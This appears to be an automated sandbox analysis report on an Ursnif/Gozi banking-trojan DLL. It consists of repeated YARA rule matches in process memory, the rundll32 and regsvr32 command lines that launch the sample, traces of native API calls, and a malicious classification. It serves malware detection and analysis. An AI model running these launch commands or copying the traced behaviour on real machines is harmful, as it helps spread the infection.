                  Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002284
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF82FC
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF2792
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF2DCC
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E382FC
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E32DCC
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E32792
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E82FC
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E2DCC
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E2792
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001BA8 GetProcAddress,NtCreateSection,memset,
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001D37 NtMapViewOfSection,
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100024A5 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF8521 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E3737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E38521 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E8521 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
                  Source: ursnif_IAT_corrected.exe.dll | Virustotal: Detection: 55%
                  Source: ursnif_IAT_corrected.exe.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll"
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                  Source: classification engine | Classification label: mal100.troj.evad.winDLL@10/0@8/3
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF7256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_01
                  Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002220 push ecx; ret
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002273 push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF82EB push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AFB859 push 0000006Fh; retf
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF7F00 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E382EB push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E3B859 push 0000006Fh; retf
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E37F00 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045EB859 push 0000006Fh; retf
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E82EB push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E7F00 push ecx; ret
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100015BD LoadLibraryA,GetProcAddress,
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll

                  Hooking and other Techniques for Hiding and Protection

                  Source: Yara match | File source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
